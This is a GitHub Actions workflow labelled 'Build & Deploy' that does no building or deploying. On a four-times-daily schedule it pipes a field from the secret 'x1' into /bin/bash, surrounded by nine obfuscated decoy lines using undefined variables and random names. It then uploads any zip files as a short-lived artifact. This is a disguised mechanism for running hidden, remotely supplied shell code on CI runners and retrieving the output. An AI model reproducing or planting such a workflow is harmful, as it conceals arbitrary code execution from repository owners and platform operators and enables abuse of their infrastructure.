name: Build & Deploy
on:
  workflow_dispatch:

  schedule:
    - cron: '13 2,8,14,20 * * *'
permissions:
  contents: read
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  scheduler:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 1
      - name: Invoke
        env:
          x1: ${{ secrets.x1 }}
        run: |
          printf '%s' "$x1" | jq -r .byooq455 | /bin/bash
          echo $mq3223 | jq -r .wtb04 | /bin/bash
          printf '%s' "$vxox9" | jq -r .ygcqo16 | /bin/bash
          echo $ecsvf52 | jq -r .prppr724 | /bin/bash
          echo $q9464 | jq -r .iv8980 | /bin/bash
          echo $lpi378 | jq -r .w81 | /bin/bash
          printf '%s' "$irlg9821" | jq -r .ijqf209 | /bin/bash
          echo $xe7 | jq -r .vjht2 | /bin/bash
          echo $e953 | jq -r .wh7211 | /bin/bash
          echo $fbg55790 | jq -r .oet247 | /bin/bash

      - name: Store artifact
        if: always()
        uses: actions/upload-artifact@v4
        with:
          name: 0vo2TcNf
          path: "*.zip"
          retention-days: 1
